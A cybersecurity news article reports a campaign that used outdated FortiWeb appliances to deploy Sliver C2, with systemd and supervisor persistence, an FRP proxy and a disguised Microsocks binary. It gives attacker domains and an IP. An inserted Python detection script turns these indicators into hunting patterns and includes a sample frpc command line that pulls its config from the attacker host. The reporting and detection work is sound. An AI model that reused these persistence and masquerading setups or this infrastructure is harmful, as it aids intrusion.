Threat Actor Leverages Multiple FortiWeb Appliances to Deploy Sliver C2 for Long-Term Access

A new cybersecurity investigation has uncovered a threat actor exploiting outdated FortiWeb appliances to deploy the Sliver command-and-control (C2) framework, achieving persistent access across global targets.

The campaign was detected during open-directory threat-hunting on Censys, where exposed Sliver databases and logs revealed extensive compromise activity.

Many affected FortiWeb devices were running outdated versions from 5.4.202 to 6.1.62, lacking integrated detection and monitoring capabilities.

Exploitation and Sliver Deployment

Ctrlaltintel suggests that the attacker gained initial access by exploiting public-facing services via the React2Shell (CVE-2025-55182) vulnerability and other unpatched FortiWeb flaws.

Although the precise exploit used on FortiWeb remains unknown, the devices were all substantially outdated. Once compromised, the attacker deployed the open-source Sliver C2 toolkit, renaming the binary to “system-updater” and placing it at the path /bin/.root/system-updater.

Two primary C2 servers were identified as the command hubs: ns1.ubunutpackages[.]store and ns1.bafairforce[.]army, both registered under Autonomous System 62005.

[Figure: FortiWeb Sliver C2 attack]

The operators disguised these servers behind deceptive websites, including a fake “Ubuntu Packages” page and an imitation of the Bangladesh Air Force recruitment site.

The Bangladesh-themed infrastructure closely mirrors several victims located in the country, indicating that this operation was likely targeted rather than opportunistic.

Between December 22 and December 30, 2025, researchers recorded 30 unique victim IPs beaconing to these Sliver instances, including organizations based in Bangladesh, Pakistan, India, South Africa, and the United States.

Persistence and Proxy Infrastructure

To maintain persistence, the threat actor configured malicious systemd and supervisor services under the names “Updater Service” and “rootbinary.”

These ensured automatic execution of the Sliver binary during system boot or after process failure, corresponding to MITRE ATT&CK persistence technique T1543.002.

Beyond persistence, the attacker expanded access by deploying the Fast Reverse Proxy (FRP) tool, which was downloaded from a public server at 45.83.181[.]160:8003.

The FRP service was used to expose internal network resources to external networks, thereby turning compromised FortiWeb hosts into proxy nodes for remote command execution.

In addition, the adversary employed Microsocks for SOCKS proxying, disguising the binary as “cups-lpd” to mimic the legitimate CUPS printing daemon on port 515.

This binary even contained optional, hard-coded credentials, allowing remote, authenticated access when configured with specific runtime options.
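As an added defender-side example (not part of the original report or the researchers' tooling), the following Python hunts for the persistence and masquerading indicators described above, the "Updater Service" and "rootbinary" service names, the hidden /bin/.root/system-updater path, the cups-lpd lookalike, and the C2/FRP hosts, over constructed samples of unit files and ps output. The genuine cups-lpd location and the "any binary launched from a dot-directory under a system bin path" generalisation are assumptions.

```python
"""Hunt for the Sliver/FortiWeb persistence indicators named in this report, over
systemd unit / supervisor files and `ps -eo pid,comm,args` output (samples constructed)."""
import re

# Indicators taken from the report (C2 hosts and FRP download IP shown undefanged).
KNOWN_PATHS = {"/bin/.root/system-updater"}
SERVICE_NAMES = {"Updater Service", "rootbinary"}
C2_INDICATORS = {"ns1.ubunutpackages.store", "ns1.bafairforce.army", "45.83.181.160"}
LEGIT_CUPS_LPD = "/usr/lib/cups/daemon/cups-lpd"  # assumption: Debian-style location
# Generalisation: any executable launched from a dot-directory under a system bin path.
HIDDEN_BIN = re.compile(r"^/(?:usr/)?s?bin/\.[^./\s][^/\s]*/\S+")

def scan_units(units: dict[str, str]) -> list[str]:
    """units maps a unit/program file name to its text; returns one finding per indicator."""
    hits = []
    for fname, text in units.items():
        if any(name in text for name in SERVICE_NAMES):
            hits.append(f"{fname}: service name matches a reported persistence name")
        for m in re.finditer(r"^(?:ExecStart|command)\s*=\s*(\S+)", text, re.M):
            exe = m.group(1)
            if exe in KNOWN_PATHS or HIDDEN_BIN.match(exe):
                hits.append(f"{fname}: launches {exe} from a hidden system directory")
    return hits

def scan_processes(ps_output: str) -> list[str]:
    """ps_output is `ps -eo pid,comm,args` text; the first ARGS token is the executable path."""
    hits = []
    for line in ps_output.strip().splitlines()[1:]:  # skip the header row
        parts = line.split()
        if len(parts) < 3:
            continue
        pid, comm, exe, cmdline = parts[0], parts[1], parts[2], " ".join(parts[2:])
        if comm == "cups-lpd" and exe != LEGIT_CUPS_LPD:
            hits.append(f"pid {pid}: cups-lpd lookalike running from {exe}")
        if exe in KNOWN_PATHS or HIDDEN_BIN.match(exe):
            hits.append(f"pid {pid}: {comm} runs from hidden path {exe}")
        if any(ind in cmdline for ind in C2_INDICATORS):
            hits.append(f"pid {pid}: command line references reported C2 infrastructure")
    return hits

SAMPLE_UNITS = {  # constructed: a systemd unit, a benign unit and a supervisor program block
    "updater.service": "[Unit]\nDescription=Updater Service\n[Service]\nExecStart=/bin/.root/system-updater\n",
    "sshd.service": "[Unit]\nDescription=OpenBSD Secure Shell server\n[Service]\nExecStart=/usr/sbin/sshd -D\n",
    "rootbinary.conf": "[program:rootbinary]\ncommand=/bin/.root/system-updater\nautorestart=true\n",
}
SAMPLE_PS = """PID COMMAND ARGS
812 cups-lpd /usr/lib/cups/daemon/cups-lpd
1440 cups-lpd /usr/local/bin/cups-lpd -p 515
1503 frpc /tmp/frpc -c http://45.83.181.160:8003/frpc.ini
"""
```

Running `scan_units(SAMPLE_UNITS)` flags both the systemd unit and the supervisor block twice (name and hidden path), while `scan_processes(SAMPLE_PS)` passes the genuine cups-lpd and flags the lookalike and the FRP client.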

The campaign underscores the ongoing risk posed by outdated edge appliances that lack endpoint protection or threat telemetry.

Without appropriate monitoring, these devices provide ideal footholds for adversaries deploying post-exploitation frameworks such as Sliver, enabling prolonged, undetectable access across enterprise networks.


The post Threat Actor Leverages Multiple FortiWeb Appliances to Deploy Sliver C2 for Long-Term Access appeared first on Cyber Security News.